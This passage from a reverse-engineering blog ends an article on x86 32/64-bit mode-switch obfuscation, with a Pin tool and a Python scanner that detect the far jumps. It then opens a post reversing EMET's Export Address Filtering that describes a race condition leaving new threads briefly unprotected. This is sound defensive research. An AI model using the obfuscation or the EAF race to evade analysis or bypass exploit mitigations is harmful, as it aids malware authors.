<span style="font-family: Courier New, Courier, monospace;">VOID DetectFarJmp(ADDRINT InstrEip, UINT32 Opcode) </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if(LastJmp64)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "after jmp 64: eip %08x \n", InstrEip);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>LastJmp64 = false;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// EA offset32 selector16: jmp far ptr16:32, with selector 0x33 (64bit code segment)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if( ((UINT8*)(InstrEip))[0] == 0xEA &&</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>((UINT8*)(InstrEip))[5] == 0x33 &&</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>((UINT8*)(InstrEip))[6] == 0)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Jump seg 64! eip %08x \n", InstrEip);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>LastJmp64 = true;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VOID Instruction(INS Ins, VOID *v)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>INS_InsertCall(Ins, IPOINT_BEFORE, (AFUNPTR)DetectFarJmp, IARG_INST_PTR, IARG_UINT32, INS_Opcode(Ins), IARG_END);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">VOID Fini(INT32 code, VOID *v)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Terminating execution\n");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fflush(OutTrace);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fclose(OutTrace);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">INT32 Usage()</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PIN_ERROR("Itrace pintool 1\n");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return -1;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">int main(int argc, char * argv[])</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>OutTrace = fopen("itrace.txt", "wb");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>WINDOWS::HMODULE hNtdll;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>hNtdll = WINDOWS::LoadLibrary("ntdll");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>ExceptionDispatcher = (ADDRINT)WINDOWS::GetProcAddress(hNtdll, "KiUserExceptionDispatcher");</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Exception handler address: %08x \n", ExceptionDispatcher);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>WINDOWS::FreeLibrary(hNtdll);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Initialize pin</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if (PIN_Init(argc, argv)) </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return Usage();</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Register Instruction to be called to instrument instructions</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>INS_AddInstrumentFunction(Instruction, 0);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Register Fini to be called when the application exits</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PIN_AddFiniFunction(Fini, 0);</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>// Start the program, never returns</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>fprintf(OutTrace, "Starting Pintool\n"); </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PIN_StartProgram();</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>return 0;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------------------------------- CUT HERE ---------------------------------</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It simply looks for the opcode of a far jump to the 64bit code selector (33h) and, when it finds one, prints its address and then the address of the next instruction that gets executed. Running the test produces the following log before the application crashes:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Exception handler address: 772f0124 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Starting Pintool</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 773010b2 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772ffb9a </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772ffa1a </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 748f2320 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772ffa1a</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">...</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Jump seg 64! eip 01121022 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">after jmp 64: eip 772f0124</span> </div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As we can see, the jumps within system DLLs are detected correctly and the problem occurs only at address 0x01121022, that is, the application's first far jump. We can tell this also because the instruction that follows it is at address 0x772f0124, which is the address of KiUserExceptionDispatcher (the function Windows calls in user mode when an exception occurs).</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Moreover, the application works perfectly when run normally and crashes only when run under Pin.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I haven't investigated these details deeply, but it seems that something goes wrong in Pin's instrumented code when the far jump comes from the application, while Pin may have its own logic to handle the ones performed by Windows' internal API calls.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">And there goes another tool...!</span></div>
</div>
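<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The Pintool performs its check at run time, and the run crashes. The same opcode test can be done statically on the raw bytes of a module. As an added example (not part of the original article or its Pintool), the Python scanner below looks for the far jmp encoding EA offset32 33 00, follows the offset into the 64bit stub, finds the iretq that ends it and recovers both the 32bit address at which execution resumes (the imm32 pushed right before the iretq) and any hidden "push imm32" emulated with "sub rsp, 4 / mov dword ptr [rsp], imm32". The sample bytes are constructed from the "after the modification" listing above; the call displacements and string offsets the listing does not show are made-up values. A linear byte scan like this can obviously be fooled by a stray EAh byte in data, or by a stub laid out differently from the one in this article; a disassembler-driven scan would be more robust.</span></div>
</div>

```python
import re
import struct

# EA offset32 selector16: "jmp far ptr sel:offset" (ptr16:32). Only selector 33h, the 64bit
# code segment, is of interest; this is the same byte test the Pintool above performs.
FAR_JMP_64 = re.compile(rb"\xEA(?P<off>.{4})\x33\x00", re.DOTALL)
IRETQ = b"\x48\xCF"                               # iretq: the way back to 32bit mode
PUSH_IMM32_64 = b"\x48\x83\xEC\x04\xC7\x04\x24"   # sub rsp, 4 ; mov dword ptr [rsp], imm32


def find_mode_switches(code, base, max_stub=64):
    """Scan a code blob loaded at `base` for far jumps into 64bit mode and describe each stub:
    where it is entered, where 32bit execution resumes, and which 'push imm32' it hides."""
    found = []
    for m in FAR_JMP_64.finditer(code):
        target = struct.unpack("<I", m.group("off"))[0]
        entry = {"jmp_at": base + m.start(), "target": target, "returns_to": None, "hidden": []}
        start = target - base
        if 0 <= start < len(code):                 # target outside the blob: report the jump only
            window = code[start:start + max_stub]
            end = window.find(IRETQ)
            if end != -1:
                stub = window[:end]
                # the 32bit eip is the imm32 of the 'push imm32' (68) that precedes the iretq
                if end >= 5 and stub[end - 5] == 0x68:
                    entry["returns_to"] = struct.unpack("<I", stub[end - 4:end])[0]
                # every "sub rsp, 4 ; mov dword ptr [rsp], imm32" pair emulates a 32bit push
                pos = stub.find(PUSH_IMM32_64)
                while pos != -1 and pos + 11 <= len(stub):
                    entry["hidden"].append(("push", struct.unpack("<I", stub[pos + 7:pos + 11])[0]))
                    pos = stub.find(PUSH_IMM32_64, pos + 11)
        found.append(entry)
    return found


# Constructed sample: the bytes of the "after the modification" listing above, starting at
# 0x401018. The call displacements and string offsets are not in the listing and are made up.
SAMPLE_BASE = 0x401018
SAMPLE = bytes.fromhex(
    "68 00 30 40 00"                    # 401018 push offset aMain_txt
    "E8 00 00 00 00"                    # 40101D call FileCreate
    "EA 29 10 40 00 33 00"              # 401022 jmp far 33h:401029h
    "48 83 EC 04 C7 04 24 14 00 00 00"  # 401029 sub rsp,4 ; mov dword ptr [rsp],14h
    "48 83 EC 04 89 04 24 48 8B C4"     # 401034 sub rsp,4 ; mov [rsp],eax ; mov rax,rsp
    "6A 2B 50 68 46 02 00 00 6A 23"     # 40103E push 2Bh ; push rax ; push 246h ; push 23h
    "68 4F 10 40 00 48 CF"              # 401048 push 40104Fh ; iretq
    "58"                                # 40104F pop eax
    "68 10 30 40 00 6A 00 50"           # 401050 push offset aTestTest ; push 0 ; push eax
    "A3 40 30 40 00 E8 00 00 00 00"     # 401058 mov dword_403040, eax ; call FileSeekWrite
)


def describe(code, base):
    """Human-readable report, one line per detected mode switch."""
    lines = []
    for e in find_mode_switches(code, base):
        hidden = ", ".join("%s %Xh" % (op, v) for op, v in e["hidden"]) or "nothing recognised"
        back = "%08X" % e["returns_to"] if e["returns_to"] is not None else "?"
        lines.append("far jmp at %08X -> 64bit stub at %08X, hides: %s, returns to %s"
                     % (e["jmp_at"], e["target"], hidden, back))
    return lines


if __name__ == "__main__":
    print("\n".join(describe(SAMPLE, SAMPLE_BASE)))
```

<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">On the sample this reports one switch at 0x401022 into a stub at 0x401029 that hides "push 14h" and returns to 0x40104F, which is exactly the information the disassembler lost. Feeding it a real module means reading the .text section and passing its virtual address as the base.</span></div>
</div>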
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As a note: you can use the 32bit version of Pin to instrument a 64bit process too (although a 64bit build of Pin exists as well): the process runs in 32bit mode, but the 64bit module is loaded and can be run without problems. So I think it should also be possible to call 32bit code from a 64bit process, but I have not tried this yet.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">8 - Conclusion</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Legacy software and hardware are always a pain, and this is a good example of why. This obfuscation derives from the 32bit legacy in our shiny new 64bit CPUs, and it offers many advantages:</span></div>
</div>
<div>
<ul>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it hides computations mixing operations in 32bit and 64bit modes</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it hides parameters for API calls</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it hides API calls</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it destroys code and data cross references</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it makes analysis time consuming</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it can only be debugged via remote debugging</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">it is difficult to build automated tools that undo this obfuscation</span></li>
<li style="text-align: justify;"><span style="font-family: Verdana, sans-serif;">64bit support in analysis tools is, in general, not very good</span></li>
</ul>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that when I say "hide" I mean that the code is difficult to visualize correctly in the disassembler or in usermode debuggers.</span><br />
<span style="font-family: Verdana, sans-serif;">The code is still there, but the current tools have difficulties dealing with it.</span></div>
</div>
<div>
<br />
<div style="text-align: justify;">
<u style="font-family: Verdana, sans-serif;">Note:</u><span style="font-family: Verdana, sans-serif;"> I wrote this blog entry about two years ago and proposed it to Phrack magazine. In the end they declined it just a few months ago, so I decided to publish it here anyway. Some of the findings reported here were new at the time of writing, but were later published by other researchers (see the references). Also, even though I took some time to review this material again, some of the tool limitations I outlined for handling this obfuscation may have been fixed in newer software releases. Hope you enjoyed the article anyway :)</span></div>
<br /></div>
</div>
<div>
<div>
<div style="text-align: justify;">
<b><span style="font-family: Verdana, sans-serif; font-size: large;">9 - References</span></b></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[1]</b> Intel Manuals:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[2]</b> Windbg and Debugging tools for windows:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/windows/hardware/gg463009.aspx</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[3]</b> __emit:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/library/ms253948(v=vs.80).aspx</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[4]</b> Wow64:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/library/windows/desktop/aa384274(v=vs.85).aspx</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[5]</b> Pin:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://software.intel.com/en-us/articles/pin-a-dynamic-binary-instrumentation-tool</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Other articles on the subject:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[6]</b> Knockin' on Heaven's Gate - Dynamic Processor Mode Switching:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://rce.co/knockin-on-heavens-gate-dynamic-processor-mode-switching/</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[7]</b> Call64, Bypassing Wow64 Emulation Layer:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">http://waleedassar.blogspot.it/2013/01/call64-no-wow64-emulation-layer.html</span></div>
</div>
</div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>[8]</b> Ghost in the Shellcode 2014: Byte Sexual:</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">https://github.com/ctfs/write-ups/tree/master/ghost-in-the-shellcode-2014/byte-sexual</span></div>
</div>
</div>
<div>
<br /></div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">Reversing EMET's EAF (and a couple of curious findings...)</span></b><br />
<span style="font-family: Verdana, sans-serif;">giulia, 2014-03-20</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><a href="http://support.microsoft.com/kb/2458544">EMET</a> is a very useful tool that lets a user configure security protections against some common, well-known attack vectors. In this blog entry I will focus on EAF, pointing out some issues that affect the current implementation. EAF stands for Export Address Filtering and, as the name suggests, this protection controls access to the Export Table of a couple of major system DLLs, in order to make it more difficult for an attacker to obtain the addresses of the APIs when the request is performed from outside executable modules (e.g. from a shellcode running on the stack, or on the heap).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here is a snapshot of the EMET configuration interface, where you can see all the available protections (including EAF):</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtXPZH08SMEbAdibj8DxsJuneV00XJ4HrCd16HGIpmYfijrmZWv71N6-uvJ552vG65Wt6OoL92ZxBLF2CCT0Jmiq-0_DaSdOwP82-__p2CNoawfJI6xooxPRLVUb1QDlwuh3VCikj9njE/s1600/emet_main.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtXPZH08SMEbAdibj8DxsJuneV00XJ4HrCd16HGIpmYfijrmZWv71N6-uvJ552vG65Wt6OoL92ZxBLF2CCT0Jmiq-0_DaSdOwP82-__p2CNoawfJI6xooxPRLVUb1QDlwuh3VCikj9njE/s640/emet_main.bmp" height="211" width="640" /></a></div>
<span style="font-family: Verdana, sans-serif;"></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">EMET uses the <a href="http://technet.microsoft.com/en-us/library/dd837644(v=ws.10).aspx">Shims engine</a> to inject its module into all the protected processes: if you inspect a process on which EMET is active (e.g. with Process Explorer), you will notice the presence of EMET.dll, which means that at least one protection is active for that process. So, EMET operates from inside the process in order to enable its protections, but, despite this "invasive" approach, I haven't noticed problems in performance or functionality. Some compatibility problems do exist (given the tricky nature of some protections), but they are well documented for all the most common software.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;">Let's start focusing on EAF itself. First, EMET protects EMET.dll by calling the GetModuleHandleEx API: if you pass it the flags GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS and GET_MODULE_HANDLE_EX_FLAG_PIN together with an address inside EMET.dll itself, the DLL will stay loaded until the process is terminated (no matter how many times FreeLibrary is called).</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;">Then, EMET reads the Export Table of kernel32.dll and of ntdll.dll (the two DLLs being protected) and, in both cases, saves the AddressOfFunctions field (from the IMAGE_EXPORT_DIRECTORY structure), which holds the address of the array containing the addresses of all the exported APIs. Having done that, EMET installs a global Exception Handler by calling the AddVectoredExceptionHandler API, which will be used to filter all the exceptions that occur when a hardware breakpoint is hit. I will describe this Exception Handler routine later.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;">Now EMET proceeds in activating the protection by forking the execution into two threads.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">The main one uses the CreateToolhelp32Snapshot/Thread32First/Thread32Next </span><span style="font-family: Verdana, sans-serif;">APIs to get a list of all the running threads of the current process and saves them in an array:</span></span><br />
<br />
<span style="color: #222222; font-family: Courier New, Courier, monospace;">.text:0005486D push 0FFFFFFFFh ; dwMilliseconds</span><br />
<span style="color: #222222; font-family: 'Courier New', Courier, monospace;">.text:0005486F push array_mutex ; hHandle</span><span style="background-color: white; color: #222222; font-family: Courier New, Courier, monospace;"></span><br />
<span style="background-color: white; color: #222222; font-family: 'Courier New', Courier, monospace;">.text:00054875 call ds:WaitForSingleObject</span><br />
<span style="background-color: white; color: #222222; font-family: 'Courier New', Courier, monospace;">.text:0005487B mov eax, thread_count</span><br />
<div>
<div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054880 cmp eax, 256</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054885 jnb short loc_54897</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054887 mov ecx, [ebp+thread_id]</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:0005488A mov tid_array[eax*4], ecx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054891 inc thread_count</span></div>
<br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The second one retrieves all the threads from the array and activates </span><span style="font-family: Verdana, sans-serif;">the hardware breakpoints on them in order to protect the AddressOfFunctions fields (one per DLL) mentioned above.</span></div>
<div>
<span style="font-family: Verdana, sans-serif;">This array has a hardcoded size of 256 DWORDs, but don't be disappointed: it is only a temporary buffer to which new threads are added until they are processed, and then removed, by the protector thread.</span><br />
<span style="font-family: Verdana, sans-serif;">Moreover, EMET uses a mutex (actually saved as the first element of the array) to synchronize access to the thread list, thus ensuring that all the newly added threads are processed before the array fills up with 256 of them:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054906 Protector_Loop:</span></div>
<div style="background-color: white;">
<span style="color: magenta; font-family: Courier New, Courier, monospace;">.text:00054906 push 100</span></div>
<div style="background-color: white;">
<span style="color: magenta; font-family: Courier New, Courier, monospace;">.text:00054908 call ds:Sleep</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:0005490E push 0FFFFFFFFh</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054910 push array_mutex</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054916 call ds:WaitForSingleObject</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:0005491C mov ebx, thread_count</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054922 test ebx, ebx</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;">.text:00054924 jz short loc_5498B</span></div>
<div style="background-color: white; color: #222222;">
<span style="font-family: Courier New, Courier, monospace;"> ...</span></div>
<div style="background-color: white; color: #222222;">
<br /></div>
</div>
<div style="background-color: white; color: #222222; font-size: 13px;">
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">Still, there is a curious race condition: a certain amount of time passes between the creation of a thread, its insertion in the array and the activation of EAF by the protector thread. Due to this delay, newly created threads (including the main application thread) are not protected by EAF during the initial part of their execution.</span></div>
<div>
<br /></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUva6AvQdMq2u8vMcX5InD7NLZOUEr5JTixAfRrstYWmCNyKXNmeHXeO67MEWcmeek7uxRKHAYauNNIpHSGrY71Ypzswz7EigTEFLLf4nqRVJQj5sd7yhP7s6-vmzgyby2saOjolX9h0Q/s1600/entry1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUva6AvQdMq2u8vMcX5InD7NLZOUEr5JTixAfRrstYWmCNyKXNmeHXeO67MEWcmeek7uxRKHAYauNNIpHSGrY71Ypzswz7EigTEFLLf4nqRVJQj5sd7yhP7s6-vmzgyby2saOjolX9h0Q/s1600/entry1.bmp" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Verdana, sans-serif;">The Windows scheduler allows each thread to run only for a limited slot of time, after which execution is passed to other threads. In this way, in most scenarios, a new thread (including the main one) will run for some time before execution eventually yields to the protector thread, which will then activate the EAF protection. But what if this thread runs vulnerable code before the scheduler lets the protector thread run? Is that possible? Well, in theory it is and, actually, this is also how I discovered the race condition in the first place.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I created a little application that accesses the AddressOfFunctions field of the kernel32.dll Export Table from a shellcode loaded outside executable modules (in the </span><span style="font-family: Verdana, sans-serif;">heap), prints it and then quits. I also activated EAF from the EMET tool. My application should have crashed, but instead it worked without any problem and </span><span style="font-family: Verdana, sans-serif;">I couldn't understand why. Moreover, I made my application print the hardware debug registers, and I noticed that the hardware breakpoints were never set. Debugging </span><span style="font-family: Verdana, sans-serif;">EMET.dll I discovered the race condition: so, I added a Sleep() in the entry point of my test application to give the EAF protector thread the time to run, and lo and </span><span style="font-family: Verdana, sans-serif;">behold, my application crashed as expected when the AddressOfFunctions field was read from the malicious shellcode. </span></div>
<div>
